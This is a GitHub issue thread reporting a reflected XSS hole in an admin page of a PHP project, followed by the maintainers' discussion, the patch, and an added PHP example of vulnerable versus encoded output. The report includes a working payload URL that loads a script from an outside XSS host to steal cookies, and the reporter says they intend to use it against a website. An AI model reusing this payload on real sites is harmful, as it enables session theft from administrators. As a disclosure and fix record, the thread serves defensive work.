XSS vulnerability in admin.comms.php #253

Closed
l33cy opened this issue Apr 13, 2017 · 9 comments

@l33cy
commented Apr 13, 2017

There is a reflective XSS vulnerability on line 21 of the admin.comms.php file.
Hackers can exploit this vulnerability to obtain an administrator's cookies.

http://domain/index.php?p=admin&c=comms&rebanid=1123123123123123123231223");</script><script src=http://xsspt.com/phssz8?1492070578></script><script>alert("a
Effect in browser: [image] [image]
Code: [image]

Do not print the user input data directly on the page. Please.
My English is so poor.
Could you help me apply for a CVE number for this vulnerability?
I need it.
Thank you very much.

  • Version used: 1.5.4.7
  • PHP and MySQL version: php7.0.12 mysql5
  • Operating System and version: windows10
  • Link to your project: localhost
@good-live

commented Apr 13, 2017

I don't really see how you can abuse this to get an administrator's cookie?
Also, modern browsers (tried with Chrome) are blocking it.

@l33cy

Author

commented Apr 13, 2017

Try Firefox

@l33cy

Author

commented Apr 13, 2017

Its use has certain limits, but that does not affect the harm of the vulnerability. I'm trying to exploit this vulnerability to attack a website.

@K1N62

Contributor

commented Apr 16, 2017

If a user opens the link in their browser, the script will be executed; this is how your cookie is stolen. However, this link does more than just show an alert for demonstration purposes: this link actually downloads a script and runs it! DO NOT CLICK THE LINK

@l33cy

Author

commented Apr 17, 2017

Please apply for a CVE number on this site: https://cveform.mitre.org/

@eNNercY1337

commented Apr 17, 2017

Very useful for such a small software. @l33cy, rather show them the fix for it ;)

@Sarabveer

Member

commented Apr 17, 2017

@l33cy we have had many security holes that were patched and were never on CVE

@Groruk

Member

commented Apr 17, 2017

Applying for a CVE for such an exploit in a small open source project would take longer than just fixing it as the fix would just be the filtering of every $_GET, $_POST and $_SERVER variable. Consider it patched by tomorrow.

@Groruk

Member

commented Apr 17, 2017

Fixed with e63701e

@Groruk Groruk closed this Apr 17, 2017
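
Added example, not part of the thread and not the project's code (the contents of e63701e are not shown on this page): a request value such as `rebanid` echoed into an inline script, next to a hardened version that validates the id and encodes it for the JavaScript context. The function names and the `RebanComm` call are hypothetical, the inputs are constructed, and PHP 7.2+ is assumed.

```php
<?php
// Added illustration. Function names and the RebanComm() JS call are
// hypothetical; they are not taken from admin.comms.php.

// Escapes ", ', <, > and & as \uXXXX so a value can neither close the
// JS string literal nor terminate the surrounding <script> block.
const JS_FLAGS = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
               | JSON_INVALID_UTF8_SUBSTITUTE;

// Vulnerable pattern: the raw request value is pasted into a JS string.
function render_unsafe(string $rebanid): string
{
    return '<script>RebanComm("' . $rebanid . '");</script>';
}

// Context-aware encoding for any value that must be placed in inline JS.
function js_string(string $value): string
{
    return json_encode($value, JS_FLAGS);
}

// Hardened: accept only a positive integer id, and still encode the result
// so the output stays safe if the validation rule is loosened later.
function render_safe(string $rebanid): ?string
{
    $id = filter_var($rebanid, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject: the caller emits no script at all
    }
    return '<script>RebanComm(' . js_string((string) $id) . ');</script>';
}

// Constructed inputs: a normal id and a value shaped like the reported one.
$samples = ['42', '1");</script><script>alert("a'];

foreach ($samples as $s) {
    echo 'input:   ', $s, PHP_EOL;
    echo 'unsafe:  ', render_unsafe($s), PHP_EOL;
    echo 'safe:    ', render_safe($s) ?? '(rejected, nothing emitted)', PHP_EOL;
    echo 'encoded: ', js_string($s), PHP_EOL, PHP_EOL;
}
```

For the second input, `render_unsafe` returns markup in which the injected `</script>` ends the block, while `render_safe` returns `null` and `js_string` yields a single inert string literal.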
